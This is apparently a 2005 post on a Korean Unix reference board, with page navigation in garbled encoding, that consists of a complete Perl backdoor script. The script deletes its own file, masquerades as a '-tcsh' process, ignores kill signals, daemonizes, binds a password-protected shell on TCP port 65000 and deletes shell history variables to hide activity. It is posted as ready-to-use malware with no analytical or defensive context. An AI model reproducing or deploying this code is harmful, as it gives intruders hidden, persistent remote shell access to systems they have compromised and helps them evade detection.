BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡

±Û¾´ÀÌ: perl Perl backdoor Á¶È¸¼ö: 6453


#!/usr/bin/perl
###make PASSWORD: perl -e 'print crypt("PASSWORD_8_char","SALT_2_char");'
$crypt_pass = "niX1re4OWJKV6";
$port = 65000; $hide = "-tcsh";
unlink($0); $0 = $hide . "\0" x16;
$SIG{'INT'}='IGNORE';$SIG{'HUP'}='IGNORE';$SIG{'TERM'}='IGNORE';
$SIG{'CHLD'}='IGNORE'; if(fork()){exit(0);};
use Socket; $proto = getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
setsockopt(SERVER,SOL_SOCKET,SO_REUSEADDR,pack("l",1));
bind(SERVER,sockaddr_in($port,INADDR_ANY));
listen(SERVER,SOMAXCONN) or die "listen: $!";
for(;$paddr = accept(CLIENT,SERVER);close CLIENT){
open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");
recv CLIENT,$pass,9,0; chop($pass);
if($crypt_pass =~ crypt($pass,substr($crypt_pass,0,2))){
delete $ENV{'HISTFILE'};delete $ENV{'HISTFILESIZE'};delete $ENV{'HISTSIZE'};
if(fork()){exec {'/bin/sh'} '-tcsh' . "\0" x4;exit(0);};
}
close(STDIN);close(STDOUT);close(STDERR);
}
### End ###

°ü·Ã±Û : ¾øÀ½ ±Û¾´½Ã°£ : 2005/02/22 0:41 from 61.82.164.84

  perl telnet ¸ñ·Ïº¸±â »õ±Û ¾²±â Áö¿ì±â ÀÀ´ä±Û ¾²±â ±Û ¼öÁ¤ [PHP¿¡¼­ Oracle ClobŸÀÔÀбâ]  
BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡